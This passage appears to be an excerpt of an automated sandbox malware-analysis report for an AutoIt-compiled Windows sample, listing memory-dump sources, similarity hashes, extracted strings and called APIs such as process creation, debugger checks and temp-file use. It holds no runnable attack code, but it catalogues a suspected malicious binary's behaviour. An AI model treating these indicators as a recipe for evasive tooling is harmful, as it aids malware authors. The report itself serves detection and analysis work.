        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassMessageNameSend_wcslen
        • String ID: ComboBox$ListBox
        • API String ID: 624084870-1403004172
        • Opcode ID: e71eb9618dd6c3f7ff2de06772febbe6411e6a28f2489320397b476519f3ea62
        • Instruction ID: fb3592076d08b7154b54af9adc785d352ed0c00fd94a6e9f53d7a7a0c6f12bb2
        • Opcode Fuzzy Hash: e71eb9618dd6c3f7ff2de06772febbe6411e6a28f2489320397b476519f3ea62
        • Instruction Fuzzy Hash: BC01DB716A011967CB18FBA1CE81EFF73AC9B22340F540416F80277281FA609F78D672
        APIs
        • __Init_thread_footer.LIBCMT ref: 001FA529
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Init_thread_footer_wcslen
        • String ID: ,%+$3y#
        • API String ID: 2551934079-568776299
        • Opcode ID: 695a6464267280cad084ad1882d9ca6599034005ac26c5155e28e2cc9b0fd2f2
        • Instruction ID: d39666769019047aff13c221d6583e705df655a2fce11e57fd0d035b9e208bbb
        • Opcode Fuzzy Hash: 695a6464267280cad084ad1882d9ca6599034005ac26c5155e28e2cc9b0fd2f2
        • Instruction Fuzzy Hash: B2014271A007189BC618F368EC4BABD33188F05720FD00128FA0A1B2D3EF149D068A97
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA
        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00241DD3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassMessageNameSend_wcslen
        • String ID: ComboBox$ListBox
        • API String ID: 624084870-1403004172
        • Opcode ID: 6721254ff42cd737f4df5808f5dc0c50b6139bcd302779d9a8f5000b1dfdd97f
        • Instruction ID: 8587bc3e27cc27b95fb6514e2955b2d5e5f3708acf01c0ea6d4e05913d831e20
        • Opcode Fuzzy Hash: 6721254ff42cd737f4df5808f5dc0c50b6139bcd302779d9a8f5000b1dfdd97f
        • Instruction Fuzzy Hash: CEF0F971F60618A7C71CF7A4CC91FFF7368AF12340F140D19F822672C1EB6059688660
        APIs
        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002B3018,002B305C), ref: 002781BF
        • CloseHandle.KERNEL32 ref: 002781D1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseCreateHandleProcess
        • String ID: \0+
        • API String ID: 3712363035-3911041397
        • Opcode ID: 9533d0e8f7e945abebf067da196e6897f92dcee1a736564fd76e0a70a6a21d27
        • Instruction ID: d837f2bd9ebe6dd81bfda9e84093b6b1f1857c72b33999a6fc6edbc18caf8b45
        • Opcode Fuzzy Hash: 9533d0e8f7e945abebf067da196e6897f92dcee1a736564fd76e0a70a6a21d27
        • Instruction Fuzzy Hash: 7AF05EB2650300BBE320BB61BC4DFB73A5CDF04750F004865BB0CD51A2D675AA6487B8
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: 3, 3, 16, 1
        • API String ID: 176396367-3042988571
        • Opcode ID: 6c3000541e03b02903cc892539bfd1b7af90584a14fc97aae9284f60ee3296ad
        • Instruction ID: d0831741815558ea428f1d596a7e5b29aadfefd69a5af1cf6a5c49e342666bf7
        • Opcode Fuzzy Hash: 6c3000541e03b02903cc892539bfd1b7af90584a14fc97aae9284f60ee3296ad
        • Instruction Fuzzy Hash: 8FE02B4623536111D3312679BCC5A7F5699DFC6B50710183BFE81C22A7EE948DF193A0
        APIs
        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00240B23
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Message
        • String ID: AutoIt$Error allocating memory.
        • API String ID: 2030045667-4017498283
        • Opcode ID: d4d08e9dd1cf6faa9f5472efea6eb887ee30d9bd6bba8d019573f9a5f565ffaf
        • Instruction ID: 24db7e16eaafc556ff15176d1ae5a22cbfe1f57fb8107fc87e93f26dffe4cb07
        • Opcode Fuzzy Hash: d4d08e9dd1cf6faa9f5472efea6eb887ee30d9bd6bba8d019573f9a5f565ffaf
        • Instruction Fuzzy Hash: D5E0D83225431866D31437A47C43F9A7A848F16B64F20442EF74C594C38FE124B006ED
        APIs
          • Part of subcall function 001FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00200D71,?,?,?,001E100A), ref: 001FF7CE
        • IsDebuggerPresent.KERNEL32(?,?,?,001E100A), ref: 00200D75
        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001E100A), ref: 00200D84
        Strings
        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00200D7F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
        • API String ID: 55579361-631824599
        • Opcode ID: 25437c073cc533e09e0b6cd18fa5a3fef4c0c75a7d8bc7ced8ccc20effea5ba5
        • Instruction ID: 42159df071093d21d290142bf3444fbdbac4bc5b191576d5655e33c33a8fd9c0
        • Opcode Fuzzy Hash: 25437c073cc533e09e0b6cd18fa5a3fef4c0c75a7d8bc7ced8ccc20effea5ba5
        • Instruction Fuzzy Hash: 2EE092702107518BE3709FB8E9483467BE0EF04740F008A2DE88AC7696EBF0E4948BA1
        APIs
        • __Init_thread_footer.LIBCMT ref: 001FE3D5
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Init_thread_footer
        • String ID: 0%+$8%+
        • API String ID: 1385522511-2501399898
        • Opcode ID: 68168e0c4c4df10b89ecf0b93b9acfdb528f7e4b7d0345d4b5e09a0903dd94a5
        • Instruction ID: c38f8cd36fc4fee6b24cc61cd9ea1487bd19dde2a0fd70aa31760ed08d93b824
        • Opcode Fuzzy Hash: 68168e0c4c4df10b89ecf0b93b9acfdb528f7e4b7d0345d4b5e09a0903dd94a5
        • Instruction Fuzzy Hash: 82E08631424B18CBDB3C9718BAADAE83395FB05720B919665E613871E29B3128458B65
        APIs
        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0025302F
        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00253044
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Temp$FileNamePath
        • String ID: aut
        • API String ID: 3285503233-3010740371
        • Opcode ID: 81e901b88160d142ec5499d4ebc4b5508689ceeb9c36b38e8be7472ce8a7f62f
        • Instruction ID: 759788918ec8daf6b5c21eb9aff527ad330a4e41d14e41fc96fa74be768634b3
        • Opcode Fuzzy Hash: 81e901b88160d142ec5499d4ebc4b5508689ceeb9c36b38e8be7472ce8a7f62f
        • Instruction Fuzzy Hash: B6D05E7250032867DB20A7A4AC0EFCB3A6CDB05750F0002A1BA59E2092DEB09A84CBD0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LocalTime
        • String ID: %.3d$X64
        • API String ID: 481472006-1077770165
        • Opcode ID: b4a4f1ebff8e5f762903b60d093c3c8177c673bbe3137c5550ea26e7d0340638
        • Instruction ID: fd524dc898b57371361d265229d0ddcc074f4a173a25ca2264552936feeaa2b9
        • Opcode Fuzzy Hash: b4a4f1ebff8e5f762903b60d093c3c8177c673bbe3137c5550ea26e7d0340638
        • Instruction Fuzzy Hash: 08D012F1828118EACB9096E0FC498BBB37CAB19301F608456FD06D1042DB74D5686761
        APIs
        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0027232C
        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0027233F
          • Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FindMessagePostSleepWindow
        • String ID: Shell_TrayWnd
        • API String ID: 529655941-2988720461
        • Opcode ID: b05aa102759f1d957fb2fcc0cffaf73722b953ec810c04af0a046cea8d399206
        • Instruction ID: cc147a1bf6edc5f6f87da179ff5367cad6b195e95d856fef8a8ffb7a7757931d
        • Opcode Fuzzy Hash: b05aa102759f1d957fb2fcc0cffaf73722b953ec810c04af0a046cea8d399206
        • Instruction Fuzzy Hash: 5ED012763E4310B7E66CB770EC4FFC6BA18AB41B10F15491AB749AA1D0CAF0A851CE54
        APIs
        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0027236C
        • PostMessageW.USER32(00000000), ref: 00272373
          • Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FindMessagePostSleepWindow
        • String ID: Shell_TrayWnd
        • API String ID: 529655941-2988720461
        • Opcode ID: 28794e811cb8c1c96f5635390df308785d9822c79dc090dab6c99dde04781900
        • Instruction ID: c163bdb2e08e81829b22dcae6b6e572360e96ce118ada1697acfec5ae01e888a
        • Opcode Fuzzy Hash: 28794e811cb8c1c96f5635390df308785d9822c79dc090dab6c99dde04781900
        • Instruction Fuzzy Hash: 02D0C9723E1310BBE668A770AC4FFC6A618AB45B10F55491AB649AA1D0CAA0A8518A54
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0021BE93
        • GetLastError.KERNEL32 ref: 0021BEA1
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021BEFC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharMultiWide$ErrorLast
        • String ID:
        • API String ID: 1717984340-0
        • Opcode ID: 0d8e312cea00e949de70bffccfc560372b047e4ce9a1d0763283dc1b65ff56ff
        • Instruction ID: 1b52958f37898a862ad404a2219a83e362f0d227dcdc032bcb98c67e2252a9fc
        • Opcode Fuzzy Hash: 0d8e312cea00e949de70bffccfc560372b047e4ce9a1d0763283dc1b65ff56ff
        • Instruction Fuzzy Hash: 5741C435624207AFCF228F64CC44AEA7BF5AF61320F244169F959975E1DB308DA2CB50